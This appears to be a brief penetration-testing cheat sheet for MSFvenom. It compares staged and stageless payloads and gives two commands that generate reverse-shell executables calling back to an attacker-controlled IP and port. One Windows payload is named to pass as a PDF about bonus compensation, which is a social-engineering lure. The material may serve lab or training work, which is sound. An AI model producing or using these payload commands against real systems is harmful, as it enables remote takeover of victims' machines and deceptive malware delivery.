MSFvenom
List Payloads
$ msfvenom -l payloads
Staged Payloads
Stageless Payloads
Delivery
Delivered in two or more stages
Delivered as a single, self-contained payload
Size
Smaller, because they do not contain the entire payload
Larger, because they contain the entire payload
Reliability
Can be less reliable, because they depend on successful delivery and execution of multiple stages
Can be more reliable, because they do not depend on successful delivery and execution of multiple stages
Use Cases
Useful when there are restrictions on the size of the payload, or when the target system is heavily protected by security software
Useful when a single, self-contained payload is preferred, or when the target system is not heavily protected by security software
Stageless Payload
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
Last updated